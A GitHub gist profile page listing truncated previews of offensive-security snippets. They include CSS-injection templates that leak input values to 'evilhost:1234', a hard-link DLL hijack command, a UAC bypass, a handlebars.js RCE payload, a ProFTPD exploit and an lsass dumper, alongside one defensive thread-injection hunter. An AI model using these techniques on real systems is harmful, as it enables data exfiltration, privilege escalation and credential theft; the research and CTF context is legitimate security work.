Skip to content

Instantly share code, notes, and snippets.

View deltaclock's full-sized avatar

Nick deltaclock

82 followers · 58 following
View GitHub Profile
@deltaclock
deltaclock / Get-InjectedThread.ps1
Created February 13, 2020 16:01 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@deltaclock
deltaclock / Seatbelt.boo
Created February 5, 2020 16:28 — forked from byt3bl33d3r/Seatbelt.boo
A Boolang port of GhostPack's Seatbelt (https://github.com/GhostPack/Seatbelt)
/*
This is a complete port of @Harmjoy's Seatbelt tool to Boolang
All credit goes to him for writing this beast
https://github.com/GhostPack/Seatbelt
*/
@deltaclock
deltaclock / Update_Notes.md
Created January 13, 2020 14:12
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@deltaclock
deltaclock / gen_css.py
Created December 22, 2019 15:04 — forked from vladvis/gen_css.py
import time
import requests
host = 'evilhost:1234'
start_template = 'input.sgn[value^="%02x"]{content:url(http://'+host+'/s/%02x);}'
triple_template = 'input.sgn[value*="%03x"]~button{--p%s:url(http://'+host+'/q/%03x);}'
timestamp_template = 'input.timestamp[value="%s"]{background:url(http://'+host+'/t/%s);}'
frames = '''button{animation:l1 35s;}
@deltaclock
deltaclock / cache_review.go
Created December 22, 2019 12:56 — forked from patryk4815/cache_review.go
It is solver for task Cache Review at justCTF 2019
package main
import (
"crypto/rand"
"crypto/sha1"
"encoding/base64"
"errors"
"flag"
"fmt"
"io"
@deltaclock
deltaclock / Instructions.md
Created November 7, 2019 15:50
Headless Remote Chrome Debugging - Ichabod Chrome :)

Target

Start Chrome with the following flags:

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"

--remote-debugging-port=9222

--remote-debugging-address=0.0.0.0

@deltaclock
deltaclock / akagi_58a.c
Created October 24, 2019 12:31 — forked from hfiref0x/akagi_58a.c
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@deltaclock
deltaclock / 0day.handlebars
Created September 20, 2019 10:51 — forked from itszn/0day.handlebars
handlebars.js rce 0day
//First we want to create an array
{{#with "a" as |str|}}
{{#with split as |list|}}
//Store some function that returns a truthy value into the array
//We use arrays to hold functions because handlebars will call functions
{{this.pop}}
{{this.push this.toString}}
{{this.pop}}
@deltaclock
deltaclock / proftpd.py
Last active August 25, 2019 13:27
#!/usr/bin/env python3
############################
# Tested on ProFTPD 1.3.3a #
############################
import sys
import socket
import struct
class Data:
@deltaclock
deltaclock / autoProc.py
Created August 24, 2019 14:29 — forked from knavesec/autoProc.py
Automatic lsass dumper
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages